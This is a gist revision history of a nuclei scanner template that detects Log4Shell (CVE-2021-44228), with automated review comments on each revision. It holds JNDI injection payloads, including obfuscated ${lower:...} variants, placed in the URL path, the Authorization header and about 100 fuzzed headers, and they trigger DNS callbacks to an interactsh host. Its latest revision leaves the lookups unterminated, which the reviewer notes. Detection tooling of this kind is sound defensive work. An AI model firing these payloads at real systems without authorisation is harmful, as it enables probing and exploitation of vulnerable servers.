
@0x254
Forked from hazcod/CVE-2021-44228.nuclei.yaml
Created January 27, 2022 13:37
Revisions

  1. @hazcod hazcod revised this gist Dec 14, 2021. 1 changed file with 10 additions and 10 deletions.
    20 changes: 10 additions & 10 deletions CVE-2021-44228.nuclei.yaml
    @@ -9,7 +9,7 @@ info:
    requests:
    - raw:
    - |
    GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1
    GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    @@ -20,7 +20,7 @@ requests:

    - raw:
    - |
    GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1
    GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    @@ -31,7 +31,7 @@ requests:

    - raw:
    - |
    GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1
    GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    @@ -42,7 +42,7 @@ requests:

    - raw:
    - |
    GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1
    GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    @@ -54,7 +54,7 @@ requests:

    - raw:
    - |
    GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d} HTTP/1.1
    GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    @@ -67,7 +67,7 @@ requests:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o}
    Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
    auth_type:
    @@ -86,7 +86,7 @@ requests:
    - |
    GET //{{Path}} HTTP/1.1
    Host: {{Hostname}}
    Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o}
    Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
    auth_type:
    @@ -105,7 +105,7 @@ requests:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o}
    Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
    payloads:
    auth_type:
    @@ -128,7 +128,7 @@ requests:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o}
    §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o
    payloads:
    header_val:
    @@ -246,7 +246,7 @@ requests:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    §header_val§: ${jndi:dns://{{interactsh-url}}:80/o}
    §header_val§: ${jndi:dns://{{interactsh-url}}:80/o
    payloads:
    header_val:
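Review bot: Every hunk in this revision swaps a `${...}` lookup for one without its closing `}` (the `:80/d}` → `:80/d` pair under `@@ -9,7 +9,7 @@` and the `:80/o}` → `:80/o` pairs in the later hunks), assuming the old/new print order matches the other revisions, where the first line of each pair is the prior content. An unterminated `${` is unlikely to be evaluated as a complete lookup by the target, so the interactsh DNS interaction these matchers wait for would not occur and the template would report affected hosts as clean, which is the worst failure mode for a detection template. If the brace was dropped deliberately, the reason belongs in a comment above each request, e.g. `# intentionally unterminated lookup: <reason>`; otherwise the terminated form from the previous revision should be restored. The `requests:` list these hunks belong to starts outside the hunks.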
  2. @hazcod hazcod revised this gist Dec 14, 2021. No changes.
  3. @hazcod hazcod revised this gist Dec 14, 2021. 1 changed file with 178 additions and 41 deletions.
    219 changes: 178 additions & 41 deletions CVE-2021-44228.nuclei.yaml
    @@ -13,47 +13,55 @@ requests:
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"

    - raw:
    - |
    GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"

    - raw:
    - |
    GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"

    - raw:
    - |
    GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    # TODO maybe encoding

    - raw:
    - |
    GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"

    - raw:
    - |
    @@ -69,14 +77,29 @@ requests:
    - Basic
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"

    - raw:
    - |
    GET //{{Path}} HTTP/1.1
    Host: {{Hostname}}
    Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o}
    payloads:
    auth_type:
    - Bearer
    - Oauth
    - Token
    - Basic
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"

    - raw:
    - |
    @@ -213,11 +236,125 @@ requests:

    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"


    - raw:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    §header_val§: ${jndi:dns://{{interactsh-url}}:80/o}
    payloads:
    header_val:
    - Accept
    - Accept-Charset
    - Accept-Datetime
    - Accept-Encoding
    - Accept-Language
    - Alt-Svc
    - Base-Url
    - CF-Connecting-IP
    - Cache-Control
    - Client-IP
    - Cluster
    - Cluster-Client-IP
    - Connection
    - Contact
    - Content-Length
    - Content-MD5
    - Content-Type
    - Cookie
    - DNT
    - Date
    - Destination
    - Expect
    - Forwarded
    - From
    - Front-End-Https
    - HTTP_CLIENT_IP
    - HTTP_FORWARDED
    - HTTP_FORWARDED_FOR
    - HTTP_X_FORWARDED
    - HTTP_X_FORWARDED_FOR
    - Host
    - Http-Url
    - If-Match
    - If-Modified-Since
    - If-None-Match
    - If-Range
    - If-Unmodified-Since
    - Link
    - Location
    - Max-Forwards
    - Origin
    - Pragma
    - Profile
    - Proxy
    - Proxy-Authorization
    - Proxy-Connection
    - Proxy-Host
    - Proxy-Url
    - Range
    - Real-IP
    - Redirect
    - Referer
    - Referrer
    - Refferer
    - Request-Uri
    - TE
    - True-Client-IP
    - UID
    - Upgrade
    - Uri
    - User-Agent
    - Via
    - Warning
    - X-ATT-DeviceId
    - X-Arbitrary
    - X-CSRFToken
    - X-Client-IP
    - X-Cluster-Client-IP
    - X-Correlation-ID
    - X-Csrf-Token
    - X-Do-Not-Track
    - X-Forward-For
    - X-Forwarded
    - X-Forwarded-By
    - X-Forwarded-For
    - X-Forwarded-For-IP
    - X-Forwarded-For-Original
    - X-Forwarded-Host
    - X-Forwarded-Proto
    - X-Forwarded-Server
    - X-Forwarder-For
    - X-Host
    - X-Http-Destinationurl
    - X-Http-Host-Override
    - X-Http-Method-Override
    - X-Original-Remote-Addr
    - X-Original-Url
    - X-Originating-IP
    - X-Proxy-Url
    - X-ProxyUser-IP
    - X-Real-IP
    - X-Remote-Addr
    - X-Remote-IP
    - X-Request-ID
    - X-Requested-With
    - X-Rewrite-Url
    - X-True-IP
    - X-UIDH
    - X-Wap-Profile
    - X-XSRF-TOKEN
    attack: clusterbomb

    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
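Review bot: After this revision every surviving matcher is a single `interactsh_protocol` word match on `dns` (the matcher blocks under `@@ -13,47 +13,55 @@` and the new header-fuzzing request at the end), so a finding proves only that the target resolved the callback hostname, not that a JNDI payload could be fetched or executed; the `Log4J RCE` name and `critical` severity in `info` overstate what this evidence shows. The description should state what the signal means, e.g. `description: Out-of-band (interactsh DNS) detection of Log4j JNDI lookup evaluation; a hit shows lookups are processed, not that RCE is reachable, so confirm version and JNDI egress separately.` With each `matchers:` list now holding one entry, the `matchers-condition: or` lines are no-ops and can be dropped. The `# TODO maybe encoding` comment kept in the first hunk gives a reader nothing to act on; either name the encoding meant or remove it. The `requests:` list these hunks modify begins outside them.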
  4. @hazcod hazcod revised this gist Dec 13, 2021. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion CVE-2021-44228.nuclei.yaml
    @@ -9,7 +9,7 @@ info:
    requests:
    - raw:
    - |
    GET /{{Path}}${lower:jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1
    GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
  5. @hazcod hazcod revised this gist Dec 11, 2021. 1 changed file with 44 additions and 6 deletions.
    50 changes: 44 additions & 6 deletions CVE-2021-44228.nuclei.yaml
    @@ -2,14 +2,29 @@ id: CVE-2021-44228

    info:
    name: Log4J RCE
    author: iNvist
    author: iNvist / hazcod
    severity: critical
    description: CVE-2021-44228

    requests:
    - raw:
    - |
    GET /{{Path}}${jndi:rmi://{{interactsh-url}}:80/d} HTTP/1.1
    GET /{{Path}}${lower:jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"

    - raw:
    - |
    GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    @@ -26,7 +41,7 @@ requests:

    - raw:
    - |
    GET /{{Path}}?${jndi:rmi://{{interactsh-url}}:80/d} HTTP/1.1
    GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    @@ -44,7 +59,7 @@ requests:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    Authorization: {{auth_type }} ${jndi:rmi://{{interactsh-url}}:80/o}
    Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o}
    payloads:
    auth_type:
    @@ -67,7 +82,30 @@ requests:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    §header_val§: ${jndi:rmi://{{interactsh-url}}:80/o}
    Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o}
    payloads:
    auth_type:
    - Bearer
    - Oauth
    - Token
    - Basic
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"

    - raw:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o}
    payloads:
    header_val:
    @@ -182,4 +220,4 @@ requests:
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
    - "JRMP"
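Review bot: The lookup added in the hunk at `@@ -26,7 +41,7 @@` reads `...${lower:dn}s:://...` with a doubled colon, while the equivalent probes added in `@@ -2,14 +2,29 @@` and `@@ -67,7 +82,30 @@` use `s://`; this looks like a typo rather than a deliberate variant, and if so that request silently becomes a different probe from the one intended, so either align it or add a comment saying why it differs. Separately, `author: iNvist / hazcod` in the first hunk is a free-form string; nuclei's convention for several authors is a comma-separated list, `author: iNvist,hazcod`. The `requests:` list these hunks modify begins outside them.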
  6. @hazcod hazcod renamed this gist Dec 10, 2021. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  7. @hazcod hazcod created this gist Dec 10, 2021.
    185 changes: 185 additions & 0 deletions CVE-2021-44228.nuclei
    @@ -0,0 +1,185 @@
    id: CVE-2021-44228

    info:
    name: Log4J RCE
    author: iNvist
    severity: critical
    description: CVE-2021-44228

    requests:
    - raw:
    - |
    GET /{{Path}}${jndi:rmi://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"

    # TODO maybe encoding

    - raw:
    - |
    GET /{{Path}}?${jndi:rmi://{{interactsh-url}}:80/d} HTTP/1.1
    Host: {{Hostname}}

    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"

    - raw:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    Authorization: {{auth_type }} ${jndi:rmi://{{interactsh-url}}:80/o}

    payloads:
    auth_type:
    - Bearer
    - Oauth
    - Token
    - Basic
    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"

    - raw:
    - |
    GET /{{Path}} HTTP/1.1
    Host: {{Hostname}}
    §header_val§: ${jndi:rmi://{{interactsh-url}}:80/o}

    payloads:
    header_val:
    - Accept
    - Accept-Charset
    - Accept-Datetime
    - Accept-Encoding
    - Accept-Language
    - Alt-Svc
    - Base-Url
    - CF-Connecting-IP
    - Cache-Control
    - Client-IP
    - Cluster
    - Cluster-Client-IP
    - Connection
    - Contact
    - Content-Length
    - Content-MD5
    - Content-Type
    - Cookie
    - DNT
    - Date
    - Destination
    - Expect
    - Forwarded
    - From
    - Front-End-Https
    - HTTP_CLIENT_IP
    - HTTP_FORWARDED
    - HTTP_FORWARDED_FOR
    - HTTP_X_FORWARDED
    - HTTP_X_FORWARDED_FOR
    - Host
    - Http-Url
    - If-Match
    - If-Modified-Since
    - If-None-Match
    - If-Range
    - If-Unmodified-Since
    - Link
    - Location
    - Max-Forwards
    - Origin
    - Pragma
    - Profile
    - Proxy
    - Proxy-Authorization
    - Proxy-Connection
    - Proxy-Host
    - Proxy-Url
    - Range
    - Real-IP
    - Redirect
    - Referer
    - Referrer
    - Refferer
    - Request-Uri
    - TE
    - True-Client-IP
    - UID
    - Upgrade
    - Uri
    - User-Agent
    - Via
    - Warning
    - X-ATT-DeviceId
    - X-Arbitrary
    - X-CSRFToken
    - X-Client-IP
    - X-Cluster-Client-IP
    - X-Correlation-ID
    - X-Csrf-Token
    - X-Do-Not-Track
    - X-Forward-For
    - X-Forwarded
    - X-Forwarded-By
    - X-Forwarded-For
    - X-Forwarded-For-IP
    - X-Forwarded-For-Original
    - X-Forwarded-Host
    - X-Forwarded-Proto
    - X-Forwarded-Server
    - X-Forwarder-For
    - X-Host
    - X-Http-Destinationurl
    - X-Http-Host-Override
    - X-Http-Method-Override
    - X-Original-Remote-Addr
    - X-Original-Url
    - X-Originating-IP
    - X-Proxy-Url
    - X-ProxyUser-IP
    - X-Real-IP
    - X-Remote-Addr
    - X-Remote-IP
    - X-Request-ID
    - X-Requested-With
    - X-Rewrite-Url
    - X-True-IP
    - X-UIDH
    - X-Wap-Profile
    - X-XSRF-TOKEN
    attack: clusterbomb

    matchers-condition: or
    matchers:
    - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
    - "dns"
    - type: regex
    part: interactsh_request
    regex:
    - "JRMP"
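Review bot: The `info` block at the top of the new file has no `reference`, `tags` or `classification`, and its `description` merely repeats the `id`, so someone triaging scan output is not told what the template actually does: several out-of-band probes that make the target resolve an interactsh hostname, where a hit means a JNDI lookup was evaluated, not that code execution was proven. Suggest `description: Out-of-band (interactsh) detection of Log4j JNDI lookup evaluation via URL path, Authorization and ~100 common request headers; a hit shows lookups are processed, not that RCE is reachable`, a `reference:` entry pointing at the CVE-2021-44228 advisory, and `tags: cve,cve2021,log4j,rce,oast`. The header-fuzzing request at the end sends one request per `header_val` entry to every target, which is noisy on production hosts; a comment stating the expected request volume, and `stop-at-first-match: true` on that request when the goal is only to learn whether the host is affected, would help operators scope scans. With one payload variable, `attack: clusterbomb` is equivalent to the default, which is worth a one-line comment so the choice is not read as meaningful.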